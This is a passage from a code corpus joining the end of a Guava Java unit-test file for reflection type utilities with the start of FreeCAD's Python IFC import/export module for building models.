TypeVariable<?> objectBoundJvmType = WithTypeVariable.getTypeVariable("withObjectBound");
TypeVariable<?> upperBoundJvmType = WithTypeVariable.getTypeVariable("withUpperBound");
TypeVariable<?> noBound = withBounds(noBoundJvmType);
TypeVariable<?> objectBound = withBounds(objectBoundJvmType, Object.class);
TypeVariable<?> upperBound = withBounds(upperBoundJvmType, Number.class, CharSequence.class);
assertEqualTypeVariable(noBoundJvmType, noBound);
assertEqualTypeVariable(noBoundJvmType, withBounds(noBoundJvmType, Object.class));
assertEqualTypeVariable(objectBoundJvmType, objectBound);
assertEqualTypeVariable(upperBoundJvmType, upperBound);
new TypeVariableEqualsTester()
.addEqualityGroup(noBoundJvmType, noBound)
.addEqualityGroup(objectBoundJvmType, objectBound)
.addEqualityGroup(upperBoundJvmType, upperBound)
.testEquals();
}
public void testNewTypeVariable_primitiveTypeBound() {
assertThrows(
IllegalArgumentException.class,
() -> Types.newArtificialTypeVariable(List.class, "E", int.class));
}
public void testNewTypeVariable_serializable() throws Exception {
assertThrows(
RuntimeException.class,
() -> SerializableTester.reserialize(Types.newArtificialTypeVariable(List.class, "E")));
}
private static <D extends GenericDeclaration> TypeVariable<D> withBounds(
TypeVariable<D> typeVariable, Type... bounds) {
return Types.newArtificialTypeVariable(
typeVariable.getGenericDeclaration(), typeVariable.getName(), bounds);
}
private static class TypeVariableEqualsTester {
private final EqualsTester tester = new EqualsTester();
@CanIgnoreReturnValue
TypeVariableEqualsTester addEqualityGroup(Type jvmType, Type... types) {
if (Types.NativeTypeVariableEquals.NATIVE_TYPE_VARIABLE_ONLY) {
tester.addEqualityGroup(jvmType);
tester.addEqualityGroup((Object[]) types);
} else {
tester.addEqualityGroup(Lists.asList(jvmType, types).toArray());
}
return this;
}
void testEquals() {
tester.testEquals();
}
}
private static void assertEqualTypeVariable(TypeVariable<?> expected, TypeVariable<?> actual) {
assertEquals(expected.toString(), actual.toString());
assertEquals(expected.getName(), actual.getName());
assertEquals(expected.getGenericDeclaration(), actual.getGenericDeclaration());
if (!Types.NativeTypeVariableEquals.NATIVE_TYPE_VARIABLE_ONLY) {
assertEquals(actual.toString(), expected.hashCode(), actual.hashCode());
}
assertThat(actual.getBounds())
.asList()
.containsExactlyElementsIn(asList(expected.getBounds()))
.inOrder();
}
/**
* Working with arrays requires defensive code. Verify that we clone the type array for both input
* and output.
*/
public void testNewParameterizedTypeImmutability() {
Type[] typesIn = {String.class, Integer.class};
ParameterizedType parameterizedType = Types.newParameterizedType(Map.class, typesIn);
typesIn[0] = null;
typesIn[1] = null;
Type[] typesOut = parameterizedType.getActualTypeArguments();
typesOut[0] = null;
typesOut[1] = null;
assertEquals(String.class, parameterizedType.getActualTypeArguments()[0]);
assertEquals(Integer.class, parameterizedType.getActualTypeArguments()[1]);
}
public void testNewParameterizedTypeWithWrongNumberOfTypeArguments() {
assertThrows(
IllegalArgumentException.class,
() -> Types.newParameterizedType(Map.class, String.class, Integer.class, Long.class));
}
public void testToString() {
assertEquals(int[].class.getName(), Types.toString(int[].class));
assertEquals(int[][].class.getName(), Types.toString(int[][].class));
assertEquals(String[].class.getName(), Types.toString(String[].class));
Type elementType = List.class.getTypeParameters()[0];
assertEquals(elementType.toString(), Types.toString(elementType));
}
public void testNullPointers() {
new NullPointerTester().testStaticMethods(Types.class, Visibility.PACKAGE);
}
} | java | github | https://github.com/google/guava | android/guava-tests/test/com/google/common/reflect/TypesTest.java |
#***************************************************************************
#* *
#* Copyright (c) 2014 *
#* Yorik van Havre <yorik@uncreated.net> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
__title__= "FreeCAD IFC importer - Enhanced ifcopenshell-only version"
__author__ = "Yorik van Havre"
__url__ = "http://www.freecadweb.org"
import os,time,tempfile,uuid,FreeCAD,Part,Draft,Arch,math,DraftVecUtils
if open.__module__ == '__builtin__':
pyopen = open # because we'll redefine open below
# which IFC type must create which FreeCAD type
typesmap = { "Site": ["IfcSite"],
"Building": ["IfcBuilding"],
"Floor": ["IfcBuildingStorey"],
"Structure": ["IfcBeam", "IfcBeamStandardCase", "IfcColumn", "IfcColumnStandardCase", "IfcSlab", "IfcFooting", "IfcPile", "IfcTendon"],
"Wall": ["IfcWall", "IfcWallStandardCase", "IfcCurtainWall"],
"Window": ["IfcWindow", "IfcWindowStandardCase", "IfcDoor", "IfcDoorStandardCase"],
"Roof": ["IfcRoof"],
"Stairs": ["IfcStair", "IfcStairFlight", "IfcRamp", "IfcRampFlight"],
"Space": ["IfcSpace"],
"Rebar": ["IfcReinforcingBar"],
"Equipment": ["IfcFurnishingElement","IfcSanitaryTerminal","IfcFlowTerminal","IfcElectricAppliance"]
}
# specific name translations
translationtable = { "Foundation":"Footing",
"Floor":"BuildingStorey",
"Rebar":"ReinforcingBar",
"HydroEquipment":"SanitaryTerminal",
"ElectricEquipment":"ElectricAppliance",
"Furniture":"FurnishingElement",
"Stair Flight":"StairFlight",
"Curtain Wall":"CurtainWall"
}
ifctemplate = """ISO-10303-21;
HEADER;
FILE_DESCRIPTION(('ViewDefinition [CoordinationView]'),'2;1');
FILE_NAME('$filename','$timestamp',('$owner','$email'),('$company'),'IfcOpenShell','IfcOpenShell','');
FILE_SCHEMA(('IFC2X3'));
ENDSEC;
DATA;
#1=IFCPERSON($,$,'$owner',$,$,$,$,$);
#2=IFCORGANIZATION($,'$company',$,$,$);
#3=IFCPERSONANDORGANIZATION(#1,#2,$);
#4=IFCAPPLICATION(#2,'$version','FreeCAD','118df2cf_ed21_438e_a41');
#5=IFCOWNERHISTORY(#3,#4,$,.ADDED.,$,#3,#4,$now);
#6=IFCDIRECTION((1.,0.,0.));
#7=IFCDIRECTION((0.,0.,1.));
#8=IFCCARTESIANPOINT((0.,0.,0.));
#9=IFCAXIS2PLACEMENT3D(#8,#7,#6);
#10=IFCDIRECTION((0.,1.,0.));
#11=IFCGEOMETRICREPRESENTATIONCONTEXT('Plan','Model',3,1.E-05,#9,#10);
#12=IFCDIMENSIONALEXPONENTS(0,0,0,0,0,0,0);
#13=IFCSIUNIT(*,.LENGTHUNIT.,$,.METRE.);
#14=IFCSIUNIT(*,.AREAUNIT.,$,.SQUARE_METRE.);
#15=IFCSIUNIT(*,.VOLUMEUNIT.,$,.CUBIC_METRE.);
#16=IFCSIUNIT(*,.PLANEANGLEUNIT.,$,.RADIAN.);
#17=IFCMEASUREWITHUNIT(IFCPLANEANGLEMEASURE(0.017453292519943295),#16);
#18=IFCCONVERSIONBASEDUNIT(#12,.PLANEANGLEUNIT.,'DEGREE',#17);
#19=IFCUNITASSIGNMENT((#13,#14,#15,#18));
#20=IFCPROJECT('$projectid',#5,'$project',$,$,$,$,(#11),#19);
ENDSEC;
END-ISO-10303-21;
"""
def doubleClickTree(item,column):
txt = item.text(column)
if "Entity #" in txt:
eid = txt.split("#")[1].split(":")[0]
addr = tree.findItems(eid,0,0)
if addr:
tree.scrollToItem(addr[0])
addr[0].setSelected(True)
def explore(filename=None):
"""explore([filename]): opens a dialog showing
the contents of an IFC file. If no filename is given, a dialog will
pop up to choose a file."""
p = FreeCAD.ParamGet("User parameter:BaseApp/Preferences/Mod/Arch")
DEBUG = p.GetBool("ifcDebug",False)
try:
import ifcopenshell
except:
FreeCAD.Console.PrintError("IfcOpenShell was not found on this system. IFC support is disabled\n")
return
if not filename:
from PySide import QtGui
filename = QtGui.QFileDialog.getOpenFileName(QtGui.qApp.activeWindow(),'IFC files','*.ifc')
if filename:
filename = filename[0]
from PySide import QtCore,QtGui
if isinstance(filename,unicode):
import sys #workaround since ifcopenshell currently can't handle unicode filenames
filename = filename.encode(sys.getfilesystemencoding())
if not os.path.exists(filename):
print "File not found"
return
ifc = ifcopenshell.open(filename)
global tree
tree = QtGui.QTreeWidget()
tree.setColumnCount(3)
tree.setWordWrap(True)
tree.header().setDefaultSectionSize(60)
tree.header().resizeSection(0,60)
tree.header().resizeSection(1,30)
tree.header().setStretchLastSection(True)
tree.headerItem().setText(0, "ID")
tree.headerItem().setText(1, "")
tree.headerItem().setText(2, "Item and Properties")
bold = QtGui.QFont()
bold.setWeight(75)
bold.setBold(True)
entities = ifc.by_type("IfcRoot")
entities += ifc.by_type("IfcRepresentation")
entities += ifc.by_type("IfcRepresentationItem")
entities += ifc.by_type("IfcPlacement")
entities += ifc.by_type("IfcProperty")
entities += ifc.by_type("IfcPhysicalSimpleQuantity")
entities += ifc.by_type("IfcMaterial")
entities = sorted(entities, key=lambda eid: eid.id())
done = []
for entity in entities:
if hasattr(entity,"id"):
if entity.id() in done:
continue
done.append(entity.id())
item = QtGui.QTreeWidgetItem(tree)
item.setText(0,str(entity.id()))
if entity.is_a() in ["IfcWall","IfcWallStandardCase"]:
item.setIcon(1,QtGui.QIcon(":icons/Arch_Wall_Tree.svg"))
elif entity.is_a() in ["IfcBuildingElementProxy"]:
item.setIcon(1,QtGui.QIcon(":icons/Arch_Component.svg"))
elif entity.is_a() in ["IfcColumn","IfcColumnStandardCase","IfcBeam","IfcBeamStandardCase","IfcSlab","IfcFooting","IfcPile","IfcTendon"]:
item.setIcon(1,QtGui.QIcon(":icons/Arch_Structure_Tree.svg"))
elif entity.is_a() in ["IfcSite"]:
item.setIcon(1,QtGui.QIcon(":icons/Arch_Site_Tree.svg"))
elif entity.is_a() in ["IfcBuilding"]:
item.setIcon(1,QtGui.QIcon(":icons/Arch_Building_Tree.svg"))
elif entity.is_a() in ["IfcBuildingStorey"]:
item.setIcon(1,QtGui.QIcon(":icons/Arch_Floor_Tree.svg"))
elif entity.is_a() in ["IfcWindow","IfcWindowStandardCase","IfcDoor","IfcDoorStandardCase"]:
item.setIcon(1,QtGui.QIcon(":icons/Arch_Window_Tree.svg"))
elif entity.is_a() in ["IfcRoof"]:
item.setIcon(1,QtGui.QIcon(":icons/Arch_Roof_Tree.svg"))
elif entity.is_a() in ["IfcExtrudedAreaSolid","IfcClosedShell"]:
item.setIcon(1,QtGui.QIcon(":icons/Tree_Part.svg"))
elif entity.is_a() in ["IfcFace"]:
item.setIcon(1,QtGui.QIcon(":icons/Draft_SwitchMode.svg"))
elif entity.is_a() in ["IfcArbitraryClosedProfileDef","IfcPolyloop"]:
item.setIcon(1,QtGui.QIcon(":icons/Draft_Draft.svg"))
elif entity.is_a() in ["IfcPropertySingleValue","IfcQuantityArea","IfcQuantityVolume"]:
item.setIcon(1,QtGui.QIcon(":icons/Tree_Annotation.svg"))
elif entity.is_a() in ["IfcMaterial"]:
item.setIcon(1,QtGui.QIcon(":icons/Arch_Material.svg"))
item.setText(2,str(entity.is_a()))
item.setFont(2,bold);
i = 0
while True:
try:
argname = entity.attribute_name(i)
except:
break
else:
try:
argvalue = getattr(entity,argname)
except:
print "Error in entity ",entity
break
else:
if not argname in ["Id", "GlobalId"]:
colored = False
if isinstance(argvalue,ifcopenshell.entity_instance):
if argvalue.id() == 0:
t = str(argvalue)
else:
colored = True
t = "Entity #" + str(argvalue.id()) + ": " + str(argvalue.is_a())
elif isinstance(argvalue,list):
t = ""
else:
t = str(argvalue)
t = " " + str(argname) + " : " + str(t)
item = QtGui.QTreeWidgetItem(tree)
item.setText(2,str(t))
if colored:
item.setForeground(2,QtGui.QBrush(QtGui.QColor("#005AFF")))
if isinstance(argvalue,list):
for argitem in argvalue:
colored = False
if isinstance(argitem,ifcopenshell.entity_instance):
if argitem.id() == 0:
t = str(argitem)
else:
colored = True
t = "Entity #" + str(argitem.id()) + ": " + str(argitem.is_a())
else:
t = argitem
t = " " + str(t)
item = QtGui.QTreeWidgetItem(tree)
item.setText(2,str(t))
if colored:
item.setForeground(2,QtGui.QBrush(QtGui.QColor("#005AFF")))
i += 1
d = QtGui.QDialog()
d.setObjectName("IfcExplorer")
d.setWindowTitle("Ifc Explorer")
d.resize(640, 480)
layout = QtGui.QVBoxLayout(d)
layout.addWidget(tree)
tree.itemDoubleClicked.connect(doubleClickTree)
d.exec_()
del tree
return
def open(filename,skip=[],only=[],root=None):
"opens an IFC file in a new document"
docname = os.path.splitext(os.path.basename(filename))[0]
doc = FreeCAD.newDocument(docname)
doc.Label = docname
doc = insert(filename,doc.Name,skip,only,root)
return doc
def insert(filename,docname,skip=[],only=[],root=None):
"""insert(filename,docname,skip=[],only=[],root=None): imports the contents of an IFC file.
skip can contain a list of ids of objects to be skipped, only can restrict the import to
certain object ids (will also get their children) and root can be used to
import only the derivates of a certain element type (default = ifcProduct)."""
p = FreeCAD.ParamGet("User parameter:BaseApp/Preferences/Mod/Arch")
DEBUG = p.GetBool("ifcDebug",False)
PREFIX_NUMBERS = p.GetBool("ifcPrefixNumbers",False)
SKIP = p.GetString("ifcSkip","").split(",")
SEPARATE_OPENINGS = p.GetBool("ifcSeparateOpenings",False)
ROOT_ELEMENT = p.GetString("ifcRootElement","IfcProduct")
GET_EXTRUSIONS = p.GetBool("ifcGetExtrusions",False)
MERGE_MATERIALS = p.GetBool("ifcMergeMaterials",False)
if root:
ROOT_ELEMENT = root
MERGE_MODE = p.GetInt("ifcImportMode",0)
if MERGE_MODE > 0:
SEPARATE_OPENINGS = False
GET_EXTRUSIONS = False
if not SEPARATE_OPENINGS:
SKIP.append("IfcOpeningElement")
try:
import ifcopenshell
except:
FreeCAD.Console.PrintError("IfcOpenShell was not found on this system. IFC support is disabled\n")
return
if DEBUG: print "Opening ",filename,"...",
try:
doc = FreeCAD.getDocument(docname)
except:
doc = FreeCAD.newDocument(docname)
FreeCAD.ActiveDocument = doc
if DEBUG: print "done."
global ifcfile # keeping global for debugging purposes
if isinstance(filename,unicode):
import sys #workaround since ifcopenshell currently can't handle unicode filenames
filename = filename.encode(sys.getfilesystemencoding())
ifcfile = ifcopenshell.open(filename)
from ifcopenshell import geom
settings = ifcopenshell.geom.settings()
settings.set(settings.USE_BREP_DATA,True)
settings.set(settings.SEW_SHELLS,True)
settings.set(settings.USE_WORLD_COORDS,True)
if SEPARATE_OPENINGS:
settings.set(settings.DISABLE_OPENING_SUBTRACTIONS,True)
sites = ifcfile.by_type("IfcSite")
buildings = ifcfile.by_type("IfcBuilding")
floors = ifcfile.by_type("IfcBuildingStorey")
products = ifcfile.by_type(ROOT_ELEMENT)
openings = ifcfile.by_type("IfcOpeningElement")
annotations = ifcfile.by_type("IfcAnnotation")
materials = ifcfile.by_type("IfcMaterial")
if DEBUG: print "Building relationships table...",
# building relations tables
objects = {} # { id:object, ... }
additions = {} # { host:[child,...], ... }
subtractions = [] # [ [opening,host], ... ]
properties = {} # { host:[property, ...], ... }
colors = {} # { id:(r,g,b) }
shapes = {} # { id:shaoe } only used for merge mode
mattable = {} # { objid:matid }
for r in ifcfile.by_type("IfcRelContainedInSpatialStructure"):
additions.setdefault(r.RelatingStructure.id(),[]).extend([e.id() for e in r.RelatedElements])
for r in ifcfile.by_type("IfcRelAggregates"):
additions.setdefault(r.RelatingObject.id(),[]).extend([e.id() for e in r.RelatedObjects])
for r in ifcfile.by_type("IfcRelVoidsElement"):
subtractions.append([r.RelatedOpeningElement.id(), r.RelatingBuildingElement.id()])
for r in ifcfile.by_type("IfcRelDefinesByProperties"):
for obj in r.RelatedObjects:
if r.RelatingPropertyDefinition.is_a("IfcPropertySet"):
properties.setdefault(obj.id(),[]).extend([e.id() for e in r.RelatingPropertyDefinition.HasProperties])
for r in ifcfile.by_type("IfcRelAssociatesMaterial"):
for o in r.RelatedObjects:
mattable[o.id()] = r.RelatingMaterial.id()
for r in ifcfile.by_type("IfcStyledItem"):
if r.Styles[0].is_a("IfcPresentationStyleAssignment"):
if r.Styles[0].Styles[0].is_a("IfcSurfaceStyle"):
if r.Styles[0].Styles[0].Styles[0].is_a("IfcSurfaceStyleRendering"):
if r.Styles[0].Styles[0].Styles[0].SurfaceColour:
c = r.Styles[0].Styles[0].Styles[0].SurfaceColour
if r.Item:
for p in ifcfile.by_type("IfcProduct"):
if p.Representation:
for it in p.Representation.Representations:
if it.Items:
if it.Items[0].id() == r.Item.id():
colors[p.id()] = (c.Red,c.Green,c.Blue)
elif it.Items[0].is_a("IfcBooleanResult"):
if (it.Items[0].FirstOperand.id() == r.Item.id()):
colors[p.id()] = (c.Red,c.Green,c.Blue)
else:
for m in ifcfile.by_type("IfcMaterialDefinitionRepresentation"):
for it in m.Representations:
if it.Items:
if it.Items[0].id() == r.id():
colors[m.RepresentedMaterial.id()] = (c.Red,c.Green,c.Blue)
if only: # only import a list of IDs and their children
ids = []
while only:
currentid = only.pop()
ids.append(currentid)
if currentid in additions.keys():
only.extend(additions[currentid])
products = [ifcfile[currentid] for currentid in ids]
if DEBUG: print "done."
count = 0
from FreeCAD import Base
progressbar = Base.ProgressIndicator()
progressbar.start("Importing IFC objects...",len(products))
# products
for product in products:
pid = product.id()
guid = product.GlobalId
ptype = product.is_a()
if DEBUG: print count,"/",len(products)," creating object ",pid," : ",ptype,
name = str(ptype[3:])
if product.Name:
name = product.Name.decode("unicode_escape").encode("utf8")
if PREFIX_NUMBERS: name = "ID" + str(pid) + " " + name
obj = None
baseobj = None
brep = None
if pid in skip: # user given id skip list
if DEBUG: print " skipped."
continue
if ptype in SKIP: # preferences-set type skip list
if DEBUG: print " skipped."
continue
try:
cr = ifcopenshell.geom.create_shape(settings,product)
brep = cr.geometry.brep_data
except:
pass # IfcOpenShell will yield an error if a given product has no shape, but we don't care
if brep:
if DEBUG: print " ",str(len(brep)/1000),"k ",
shape = Part.Shape()
shape.importBrepFromString(brep)
shape.scale(1000.0) # IfcOpenShell always outputs in meters
if not shape.isNull():
if MERGE_MODE > 0:
if ptype == "IfcSpace": # do not add spaces to compounds
if DEBUG: print "skipping space ",pid
else:
shapes[pid] = shape
if DEBUG: print shape.Solids
baseobj = shape
else:
if GET_EXTRUSIONS:
ex = Arch.getExtrusionData(shape)
if ex:
print "extrusion ",
baseface = FreeCAD.ActiveDocument.addObject("Part::Feature",name+"_footprint")
baseface.Shape = ex[0]
baseobj = FreeCAD.ActiveDocument.addObject("Part::Extrusion",name+"_body")
baseobj.Base = baseface
baseobj.Dir = ex[1]
if FreeCAD.GuiUp:
baseface.ViewObject.hide()
if not baseobj:
baseobj = FreeCAD.ActiveDocument.addObject("Part::Feature",name+"_body")
baseobj.Shape = shape
else:
if DEBUG: print "null shape ",
if not shape.isValid():
if DEBUG: print "invalid shape ",
#continue
else:
if DEBUG: print " no brep ",
if MERGE_MODE == 0:
# full Arch objects
for freecadtype,ifctypes in typesmap.items():
if ptype in ifctypes:
obj = getattr(Arch,"make"+freecadtype)(baseobj=baseobj,name=name)
obj.Label = name
if FreeCAD.GuiUp and baseobj:
baseobj.ViewObject.hide()
# setting role
try:
r = ptype[3:]
tr = dict((v,k) for k, v in translationtable.iteritems())
if r in tr.keys():
r = tr[r]
# remove the "StandardCase"
if "StandardCase" in r:
r = r[:-12]
obj.Role = r
except:
pass
# setting uid
if hasattr(obj,"IfcAttributes"):
a = obj.IfcAttributes
a["IfcUID"] = str(guid)
obj.IfcAttributes = a
break
if not obj:
obj = Arch.makeComponent(baseobj,name=name)
if obj:
sols = str(obj.Shape.Solids) if hasattr(obj,"Shape") else "[]"
if DEBUG: print sols
objects[pid] = obj
elif MERGE_MODE == 1:
# non-parametric Arch objects
if ptype in ["IfcSite","IfcBuilding","IfcBuildingStorey"]:
for freecadtype,ifctypes in typesmap.items():
if ptype in ifctypes:
obj = getattr(Arch,"make"+freecadtype)(baseobj=None,name=name)
elif baseobj:
obj = Arch.makeComponent(baseobj,name=name,delete=True)
elif MERGE_MODE == 2:
# Part shapes
if ptype in ["IfcSite","IfcBuilding","IfcBuildingStorey"]:
for freecadtype,ifctypes in typesmap.items():
if ptype in ifctypes:
obj = getattr(Arch,"make"+freecadtype)(baseobj=None,name=name)
elif baseobj:
obj = FreeCAD.ActiveDocument.addObject("Part::Feature",name)
obj.Shape = shape
if obj:
obj.Label = name
objects[pid] = obj
# properties
if pid in properties:
if hasattr(obj,"IfcAttributes"):
a = obj.IfcAttributes
for p in properties[pid]:
o = ifcfile[p]
if o.is_a("IfcPropertySingleValue"):
a[o.Name.decode("unicode_escape").encode("utf8")] = str(o.NominalValue)
obj.IfcAttributes = a
# color
if FreeCAD.GuiUp and (pid in colors) and hasattr(obj.ViewObject,"ShapeColor"):
if DEBUG: print " setting color: ",colors[pid]
obj.ViewObject.ShapeColor = colors[pid]
# if DEBUG is on, recompute after each shape
if DEBUG: FreeCAD.ActiveDocument.recompute()
count += 1
progressbar.next()
progressbar.stop()
FreeCAD.ActiveDocument.recompute()
if MERGE_MODE == 3:
if DEBUG: print "Joining shapes..."
for host,children in additions.items():
if ifcfile[host].is_a("IfcBuildingStorey"):
compound = []
for c in children:
if c in shapes.keys():
compound.append(shapes[c])
del shapes[c]
if c in additions.keys():
for c2 in additions[c]:
if c2 in shapes.keys():
compound.append(shapes[c2])
del shapes[c2]
if compound:
name = ifcfile[host].Name or "Floor"
if PREFIX_NUMBERS: name = "ID" + str(host) + " " + name
obj = FreeCAD.ActiveDocument.addObject("Part::Feature",name)
obj.Label = name
obj.Shape = Part.makeCompound(compound)
if shapes: # remaining shapes
obj = FreeCAD.ActiveDocument.addObject("Part::Feature","Unclaimed")
obj.Shape = Part.makeCompound(shapes.values())
else:
if DEBUG: print "Processing relationships..."
# subtractions
if SEPARATE_OPENINGS:
for subtraction in subtractions:
if (subtraction[0] in objects.keys()) and (subtraction[1] in objects.keys()):
if DEBUG: print "subtracting ",objects[subtraction[0]].Label, " from ", objects[subtraction[1]].Label
Arch.removeComponents(objects[subtraction[0]],objects[subtraction[1]])
if DEBUG: FreeCAD.ActiveDocument.recompute()
# additions
for host,children in additions.items():
if host in objects.keys():
cobs = [objects[child] for child in children if child in objects.keys()]
if cobs:
if DEBUG and (len(cobs) > 10) and ( not(Draft.getType(objects[host]) in ["Site","Building","Floor"])):
# avoid huge fusions
print "more than 10 shapes to add: skipping."
else:
if DEBUG: print "adding ",len(cobs), " object(s) to ", objects[host].Label
Arch.addComponents(cobs,objects[host])
if DEBUG: FreeCAD.ActiveDocument.recompute()
FreeCAD.ActiveDocument.recompute()
# cleaning bad shapes
for obj in objects.values():
if obj.isDerivedFrom("Part::Feature"):
if obj.Shape.isNull():
Arch.rebuildArchShape(obj)
FreeCAD.ActiveDocument.recompute()
# 2D elements
if DEBUG and annotations: print "Creating 2D geometry..."
for annotation in annotations:
aid = annotation.id()
if aid in skip: continue # user given id skip list
if "IfcAnnotation" in SKIP: continue # preferences-set type skip list
name = "Annotation"
if annotation.Name:
name = annotation.Name.decode("unicode_escape").encode("utf8")
if PREFIX_NUMBERS: name = "ID" + str(aid) + " " + name
shapes2d = []
for repres in annotation.Representation.Representations:
shapes2d.extend(setRepresentation(repres))
if shapes2d:
sh = Part.makeCompound(shapes2d)
pc = str(int((float(count)/(len(products)+len(annotations))*100)))+"% "
if DEBUG: print pc,"creating object ",aid," : Annotation with shape: ",sh
o = FreeCAD.ActiveDocument.addObject("Part::Feature",name)
o.Shape = sh
count += 1
FreeCAD.ActiveDocument.recompute()
# Materials
if DEBUG and materials: print "Creating materials..."
fcmats = {}
for material in materials:
name = "Material"
if material.Name:
name = material.Name.decode("unicode_escape").encode("utf8")
if MERGE_MATERIALS and (name in fcmats.keys()):
mat = fcmats[name]
else:
mat = Arch.makeMaterial(name=name)
mdict = {}
if material.id() in colors:
mdict["Color"] = str(colors[material.id()])
if mdict:
mat.Material = mdict
fcmats[name] = mat
for o,m in mattable.items():
if m == material.id():
if o in objects:
if hasattr(objects[o],"BaseMaterial"):
objects[o].BaseMaterial = mat
FreeCAD.ActiveDocument.recompute()
if FreeCAD.GuiUp:
import FreeCADGui
FreeCADGui.SendMsgToActiveView("ViewFit")
print "Finished importing."
return doc
def export(exportList,filename):
"exports FreeCAD contents to an IFC file"
p = FreeCAD.ParamGet("User parameter:BaseApp/Preferences/Mod/Arch")
FORCEBREP = p.GetBool("ifcExportAsBrep",False)
DEBUG = p.GetBool("ifcDebug",False)
try:
global ifcopenshell
import ifcopenshell
except:
FreeCAD.Console.PrintError("IfcOpenShell was not found on this system. IFC support is disabled\n")
return
if isinstance(filename,unicode):
import sys #workaround since ifcopenshell currently can't handle unicode filenames
filename = filename.encode(sys.getfilesystemencoding())
version = FreeCAD.Version()
owner = FreeCAD.ActiveDocument.CreatedBy
email = ''
if ("@" in owner) and ("<" in owner):
s = owner.split("<")
owner = s[0]
email = s[1].strip(">")
global ifctemplate
ifctemplate = ifctemplate.replace("$version",version[0]+"."+version[1]+" build "+version[2])
ifctemplate = ifctemplate.replace("$owner",owner)
ifctemplate = ifctemplate.replace("$company",FreeCAD.ActiveDocument.Company)
ifctemplate = ifctemplate.replace("$email",email)
ifctemplate = ifctemplate.replace("$now",str(int(time.time())))
ifctemplate = ifctemplate.replace("$projectid",FreeCAD.ActiveDocument.Uid[:22].replace("-","_"))
ifctemplate = ifctemplate.replace("$project",FreeCAD.ActiveDocument.Name)
ifctemplate = ifctemplate.replace("$filename",filename)
ifctemplate = ifctemplate.replace("$timestamp",str(time.strftime("%Y-%m-%dT%H:%M:%S", time.gmtime())))
template = tempfile.mkstemp(suffix=".ifc")[1]
of = pyopen(template,"wb")
of.write(ifctemplate)
of.close()
global ifcfile, surfstyles
ifcfile = ifcopenshell.open(template)
history = ifcfile.by_type("IfcOwnerHistory")[0]
context = ifcfile.by_type("IfcGeometricRepresentationContext")[0]
project = ifcfile.by_type("IfcProject")[0]
objectslist = Draft.getGroupContents(exportList,walls=True,addgroups=True)
objectslist = Arch.pruneIncluded(objectslist)
products = {} # { Name: IfcEntity, ... }
surfstyles = {} # { (r,g,b): IfcEntity, ... }
count = 1
# products
for obj in objectslist:
# getting generic data
name = str(obj.Label.encode("utf8"))
description = str(obj.Description) if hasattr(obj,"Description") else ""
# getting uid
uid = None
if hasattr(obj,"IfcAttributes"):
if "IfcUID" in obj.IfcAttributes.keys():
uid = str(obj.IfcAttributes["IfcUID"])
if not uid:
uid = ifcopenshell.guid.compress(uuid.uuid1().hex)
# setting the IFC type + name conversions
if hasattr(obj,"Role"):
ifctype = obj.Role.replace(" ","")
else:
ifctype = Draft.getType(obj)
if ifctype in translationtable.keys():
ifctype = translationtable[ifctype]
ifctype = "Ifc" + ifctype
if ifctype == "IfcGroup":
continue
ifctypes = []
for v in typesmap.values():
ifctypes.extend(v)
if not ifctype in ifctypes:
ifctype = "IfcBuildingElementProxy"
# getting the "Force BREP" flag
brepflag = False
if hasattr(obj,"IfcAttributes"):
if "FlagForceBrep" in obj.IfcAttributes.keys():
if obj.IfcAttributes["FlagForceBrep"] == "True":
brepflag = True
# getting the representation
representation,placement,shapetype = getRepresentation(ifcfile,context,obj,forcebrep=(brepflag or FORCEBREP))
if DEBUG: print str(count).ljust(3)," : ", ifctype, " (",shapetype,") : ",name
# setting the arguments
args = [uid,history,name,description,None,placement,representation,None]
if ifctype in ["IfcSlab","IfcFooting","IfcRoof"]:
args = args + ["NOTDEFINED"]
elif ifctype in ["IfcWindow","IfcDoor"]:
args = args + [obj.Width.Value/1000.0, obj.Height.Value/1000.0]
elif ifctype == "IfcSpace":
args = args + ["ELEMENT","INTERNAL",obj.Shape.BoundBox.ZMin/1000.0]
elif ifctype == "IfcBuildingElementProxy":
args = args + ["ELEMENT"]
elif ifctype == "IfcSite":
latitude = None
longitude = None
elevation = None
landtitlenumber = None
address = None
args = args + ["ELEMENT",latitude,longitude,elevation,landtitlenumber,address]
elif ifctype == "IfcBuilding":
args = args + ["ELEMENT",None,None,None]
elif ifctype == "IfcBuildingStorey":
args = args + ["ELEMENT",obj.Placement.Base.z]
# creating the product
product = getattr(ifcfile,"create"+ifctype)(*args)
products[obj.Name] = product
# additions
if hasattr(obj,"Additions") and (shapetype == "extrusion"):
for o in obj.Additions:
r2,p2,c2 = getRepresentation(ifcfile,context,o,forcebrep=True)
if DEBUG: print " adding ",c2," : ",str(o.Label)
prod2 = ifcfile.createIfcBuildingElementProxy(ifcopenshell.guid.compress(uuid.uuid1().hex),history,str(o.Label),None,None,p2,r2,None,"ELEMENT")
ifcfile.createIfcRelAggregates(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'Addition','',product,[prod2])
# subtractions
if hasattr(obj,"Subtractions") and (shapetype == "extrusion"):
for o in obj.Subtractions:
r2,p2,c2 = getRepresentation(ifcfile,context,o,forcebrep=True,subtraction=True)
if DEBUG: print " subtracting ",c2," : ",str(o.Label)
prod2 = ifcfile.createIfcOpeningElement(ifcopenshell.guid.compress(uuid.uuid1().hex),history,str(o.Label),None,None,p2,r2,None)
ifcfile.createIfcRelVoidsElement(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'Subtraction','',product,prod2)
# properties
if hasattr(obj,"IfcAttributes"):
props = []
for key in obj.IfcAttributes:
if not (key in ["IfcUID","FlagForceBrep"]):
r = obj.IfcAttributes[key].strip(")").split("(")
if len(r) == 1:
tp = "IfcText"
val = r[0]
else:
tp = r[0]
val = "(".join(r[1:])
val = val.strip("'")
val = val.strip('"')
if DEBUG: print " property ",key," : ",str(val), " (", str(tp), ")"
if tp in ["IfcLabel","IfcText","IfcIdentifier"]:
val = str(val)
elif tp == "IfcBoolean":
if val == ".T.":
val = True
else:
val = False
